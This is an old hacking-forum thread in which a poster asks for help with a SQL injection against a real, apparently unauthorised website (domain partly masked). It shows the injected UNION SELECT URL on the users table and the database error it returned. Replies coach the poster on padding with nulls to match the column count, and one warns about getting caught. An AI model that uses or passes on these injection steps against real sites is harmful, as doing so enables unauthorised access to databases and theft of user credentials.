Donate to us via Paypal!
Capitalism is an Island of wealth in a sea of poverty
Tuesday, October 27, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 120
Guests Online: 118
Members Online: 2

Registered Members: 129433
Newest Member: jessievd69
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

BLIND SQL INJECTION SO CLOSE


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 23:39
i found a vulnerable site that does the following in the url
Code
http://www.***************.com/directory.php?cat_id=



then i did
Code
http://www.***************.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20*%20FROM%20users



it spat out this
Code
The used SELECT statements have a different number of columns



I tried a couple of things after http://www.**************.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20
but im quite stuck any suggestions from you experts?
Author

RE: BLIND SQL INJECTION SO CLOSE


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 23:45
check this site: http://www.securi. . .1P76E.html

u'll find how to do what has to be done...

but take care because u can be caught


Author

RE: BLIND SQL INJECTION SO CLOSE


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 19-03-07 23:54
i really did alot they said
Author

RE: BLIND SQL INJECTION SO CLOSE


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-03-07 01:20
this is because the union select and the original select must select the SAME amount of columns, no more, no less. you can't just use * as a wildcard. instead keep nulling out column by column until you do not get that same error.

so instead of union all select * from wherever/*
do:
union all select null from whereveer/*
union all select null, null from whereever/*
union all select null, null, null from whereever/*
and so on


Author

RE: BLIND SQL INJECTION SO CLOSE


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-03-07 01:28
sory same reply i got before

























the link is http://www.topwed. . .%20users/*
Author

RE: BLIND SQL INJECTION SO CLOSE

synstealth
Member

Your avatar

Posts: 812
Location: /etc/shadow
Joined: 30.11.04
Rank:
God
Posted on 27-03-07 14:12
use union ALL select to trick the query into thinking they have the correct columns if you want to pull something from another table using a table that exists on the server.




know where to Look
Author

RE: BLIND SQL INJECTION SO CLOSE


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 27-03-07 16:05
yeah use null's to make the to tables have the same columns